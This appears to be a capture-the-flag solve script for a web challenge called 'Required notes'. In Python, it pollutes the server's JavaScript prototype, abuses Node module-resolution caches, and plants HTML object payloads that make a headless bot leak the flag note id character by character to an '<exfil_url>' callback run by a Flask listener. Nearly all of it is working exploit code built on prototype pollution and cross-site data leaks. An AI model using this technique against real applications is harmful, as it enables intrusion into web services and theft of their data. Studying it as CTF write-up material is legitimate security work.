Required notes solve script
import requests
from flask import Flask
import string
import time
from threading import Thread
# Characters tried for each id position: 0-9 followed by a-z.
charset = string.digits + string.ascii_lowercase
# Base URL of the target instance. Paths are appended with plain string
# concatenation below, so the value has to end with "/".
url = "<instance_url>"
# Every POST in this file is sent through this local intercepting proxy
# (and with verify=False, which is what makes the proxy usable over https).
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
# Throw-away note body, posted whenever a create request is needed only
# for its side effect.
useless = {"title": "useless", "content": "just useless"}
app = Flask(__name__)
def gen_payload(fchar):
    """Build the probe markup for every one-character extension of ``fchar``.

    For each character in the module-level ``charset`` one pair of nested
    ``<object>`` elements is emitted: the outer one points at the local
    ``/search/`` endpoint for the candidate id, the inner one at the
    ``<exfil_url>/found/`` callback for the same candidate. The pairs are
    concatenated into a single string.

    Args:
        fchar: the prefix known so far; each charset character is appended.

    Returns:
        The concatenated markup as one ``str``.
    """
    candidates = (fchar + ch for ch in charset)
    return "".join(
        f"<object data='http://127.0.0.1:3000/search/{c}'>"
        f"<object data='<exfil_url>/found/{c}'></object></object>"
        for c in candidates
    )
# Reset settings.proto to clean
def reset_settings():
    """Post the default ``customise`` options so later steps start from a known state.

    The response body is echoed to stdout. ``proxies`` and ``verify=False``
    mirror every other request in this file so the traffic stays visible in
    the local intercepting proxy.
    """
    clean_options = {"data": [{"title": "optional"}, {"author": "optional"}]}
    response = requests.post(
        url + "customise", json=clean_options, proxies=proxies, verify=False
    )
    print(response.text)
# Write payload note:
def write_expl(expl):
    """Create a note whose content is ``expl`` and return its server-assigned id.

    ``reset_settings`` runs first. The server's ``Message`` field is printed
    and its ``Noteid`` field returned; a reply that is not JSON or lacks
    either key raises (``ValueError``/``KeyError``) rather than being
    swallowed.

    Args:
        expl: the note content to store.

    Returns:
        The ``Noteid`` value from the create response.
    """
    reset_settings()
    body = {"title": "asdf", "content": expl}
    response = requests.post(url + "create", json=body, proxies=proxies, verify=False)
    reply = response.json()
    print("Message From write_expl", reply["Message"])
    return reply["Noteid"]
def polluter(x, y):
    """Post the ``customise``/``create`` sequence that points name ``x`` at note ``y``.

    The steps are issued in this fixed order, each ``customise`` (except the
    empty one) followed by a ``create`` of the throw-away ``useless`` note:
    1. a title that sets ``prototype.data`` to ``{}``,
    2. an empty ``customise`` body (kept for ``data.pop()``, as in the original),
    3. a title that sets ``prototype.data.name`` to ``./notes/<x>``,
    4. a title that sets ``prototype.data.exports`` to ``./notes/<y>.json``.

    ``x`` and ``y`` are spliced into the title strings verbatim; quotes or
    path separators inside them change the injected string.
    """

    def customise(body):
        requests.post(url + "customise", json=body, proxies=proxies, verify=False)

    def create_useless():
        requests.post(url + "create", json=useless, proxies=proxies, verify=False)

    def title_option(title):
        return {"data": [{"title": title}, {"author": "optional"}]}

    customise(title_option("option(a).constructor.prototype.data={};optional"))
    create_useless()
    customise({})  # For data.pop()
    # change name to healthcheck note id
    customise(
        title_option(
            "option(a).constructor.prototype.data.name=\"./notes/" + x + "\";optional"
        )
    )
    create_useless()
    # change name to exploit note id
    customise(
        title_option(
            "option(a).constructor.prototype.data.exports=\"./notes/" + y + ".json\";optional"
        )
    )
    create_useless()
def one_step(note):
    """Run one probe round: store ``note`` as a new note, then hit the healthcheck.

    The request order below is load-bearing; the inline comments record the
    cache effect each call relies on, so do not reorder or drop any of them.
    ``note_id`` comes straight from the server's create response and is
    concatenated into a URL without validation.

    Args:
        note: the note content (the probe markup from ``gen_payload``).
    """
    # NOTE(review): unlike the POSTs elsewhere, none of the GETs here pass
    # proxies=, and this first one also omits verify=False - confirm intended.
    requests.get(url+"delete") # clear cache
    note_id=write_expl(note)
    polluter("Healthcheck",note_id)
    requests.get(url+"view/Healthcheck", verify=False) # get Healthcheck->note_id into resolve cache & deletes require cache and pathcache
    polluter("777",note_id)
    requests.get(url+"view/777", verify=False) # get note_id into require cache so Healthcheck->note_id becomes alive again
    requests.get(url+"view/"+note_id+"?temp", verify=False) # delete exploit note from file system
    r=requests.get(url+"healthcheck", verify=False) # Healthcheck -> note_id still works cuz of relativeResolveCache entry
    print(r.text)
# Starting off
# path has to be set only once, so it is done at import time rather than per round
# Silence the InsecureRequestWarning that every verify=False call would emit.
requests.packages.urllib3.disable_warnings()
# One-time customise that sets prototype.path to "./", followed by the usual
# throw-away create. This runs at import time, before the Flask app starts.
options = {
    "data": [
        {"title": "option(a).constructor.prototype.path=\"./\";optional"},
        {"author": "optional"},
    ]
}
for path, body in (("customise", options), ("create", useless)):
    requests.post(url + path, json=body, proxies=proxies, verify=False)
def attack(found):
    """Probe every one-character extension of the known prefix ``found``.

    Builds the markup with ``gen_payload`` and runs a single ``one_step``
    round with it.
    """
    one_step(gen_payload(found))
@app.route('/')
def hello():
    """Start the first probe round (empty prefix) and reply.

    Unlike ``found``, the round runs synchronously inside the request
    handler, so this response is only sent once ``attack`` returns.
    """
    attack("")
    return 'Hello, attacker!'
@app.route('/found/<note>')
def found(note):
    """Callback reached by the probe markup; continue from the reported prefix.

    ``note`` is taken straight from the request path and handed to
    ``attack`` (and from there into ``gen_payload``) without validation, and
    the route has no authentication, so any client that can reach the
    listener can start a round. The round runs on a background thread so the
    handler returns at once; a failure to start the thread is only printed.
    """
    print("Found: ",note)
    try:
        worker = Thread(target=attack, args=(note,))
        worker.start()
    except Exception as e:  # best-effort, as in the original: report and carry on
        print(e)
    return f'You found: {note}'
# Recovers 15 characters of the flag note id. Brute-force the last character separately.
if __name__ == '__main__':
    # Listen on all interfaces so the /found/ callback in the probe markup
    # can reach this process from outside the host.
    app.run(host='0.0.0.0')